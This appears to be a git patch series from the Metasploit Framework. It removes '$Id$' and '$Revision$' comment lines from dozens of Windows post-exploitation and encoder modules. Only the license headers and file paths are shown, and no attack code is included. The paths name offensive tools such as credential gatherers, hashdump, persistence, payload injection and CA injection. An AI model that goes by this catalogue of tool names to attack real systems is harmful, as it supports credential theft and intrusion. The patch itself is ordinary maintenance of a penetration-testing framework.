b/modules/post/windows/gather/credentials/coreftp.rb index 04a2858436..34ff075d6e 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index 10a98e86c3..88714a9530 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index b652ac216b..0eb76ab4c5 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index cb98be6083..1573b934d3 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 2363f9ac00..b46504c218 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index dcc811ebb2..369dba5c8a 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index cec35249cf..9837b887d3 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 3037560284..aaadfe692e 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index ce6ecf7bab..e2d7c085d3 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index af4f0394c7..3d7bfbaf57 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index f7da31eb64..0f3f700ce5 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 96f3a10d27..650d369983 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 962961962f..d94e26d0c4 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index a2e2efca15..7a1763a888 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 987dace187..7737469e2b 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index fe3f85b2ee..8de1442997 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index 560712bff2..9f633ae88a 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index e205affde7..fedc38ccf3 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_vnc_pw.rb ## diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index b7a570e264..dea4dc8b45 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index 190f106117..ed0efc6da1 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_vnc_pw.rb ## diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 854d29cf4a..e7609e1379 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 3348dc06b1..c63de3abbf 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index 0bce589801..1dbff027a3 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 138e405525..1cac932524 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index a3e1635e96..c523b6d618 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 38aa18048c..c3254064ee 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index 311cea1d13..119fd7c28a 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index f7ab6647b9..c8f734a23b 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 6b70e74c78..fc33fd2a67 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index 0d044ee67d..10b48534df 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index c660cf0168..8cd0ff45dc 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 39f2bf5609..d4dba2b539 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 1da9558147..833fbc30a0 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 746ecdc9d3..023867f57d 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index 4f0d2adb40..98393403a9 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index ed91475bb0..2531c24c8a 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index eb9a8f5c52..8b8dc28fdb 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_termserv.rb ## diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index f2b0a2b422..c4c153c3fc 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index a5ef8ea706..f3c68cfa12 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -1,4 +1,3 @@ -# $Id$ # # List physical drives and logical volumes on the remote system # diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 339e89bd7e..4ecdea8181 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -1,4 +1,3 @@ -# $Id$ # # Forensic byte-for-byte imaging of remote disks and volumes # diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 8326665764..f44821a10d 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # nbd_server.rb # # Maps remote disks and logical volumes to a local Network Block Device diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index d98c0c48b8..4706791c19 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 4d328fc41d..ad36c817e6 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index 377f28b56c..0bee51963f 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 05e5d0aff7..c525f2e564 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index c08a8351d8..86bb6deb69 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 7c7c2d7c78..85f57dd421 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 1b508052c4..4e6156329f 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 467380a180..22239b5995 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 7bee85d1cf..bf402df57f 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index bcaad6c5ce..a57872204b 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 180acca838..486516523f 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index 7d52144720..d5ded5c06d 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index f98caff6b5..03c11de89a 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 2317b7829f..05ff3978b3 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index b783a15cbe..726fab8d87 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 5798e2c22a..ec24e9cf38 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 0e0d47e134..27db9259ca 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 439432dc47..7e3888d84a 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index a992632d07..1887a5d3e5 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -1,4 +1,3 @@ -# $Id$ # # Maps remote disks and logical volumes to a local Network Block Device # server. Allows for forensic tools to be executed on the remote disk diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 8af6f41e6c..96383d6c24 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/persistence.rb b/modules/post/windows/manage/persistence.rb index decf1294cb..f566ed060f 100644 --- a/modules/post/windows/manage/persistence.rb +++ b/modules/post/windows/manage/persistence.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/pxexploit.rb b/modules/post/windows/manage/pxexploit.rb index c0ce26f8f7..1020d93762 100644 --- a/modules/post/windows/manage/pxexploit.rb +++ b/modules/post/windows/manage/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 9254611c81..858dd43151 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 2bf827ff50..a88e2dd71f 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 804b953409..c1654219c6 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 4d1be6749d..ce00bb5dd5 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index ac97d9827a..12d3f7adf4 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 1580725ecd..78bdc6650e 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index 05042c5552..793bd48d4d 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 949a9cea30..05543bbecf 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 60f5438094..7f1bd47319 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b7452a125f..42eeecb43b 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 7fe29ad0e5..916ab500f5 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index 48dd58162c..1263417e22 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index f5793911ed..73fcf6ae72 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index 0fcd514ce9..2c47a7bf78 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit From 8f2dd8e2ced5434def8c19f9e6695129c9cfb05f Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 4 Jan 2013 00:48:06 +0100 Subject: [PATCH 150/154] msftidy: Remove $Revision$ --- modules/encoders/cmd/generic_sh.rb | 1 - modules/encoders/cmd/ifs.rb | 1 - modules/encoders/cmd/printf_php_mq.rb | 1 - modules/encoders/generic/none.rb | 1 - modules/encoders/mipsbe/longxor.rb | 1 - modules/encoders/mipsle/longxor.rb | 1 - modules/encoders/php/base64.rb | 1 - 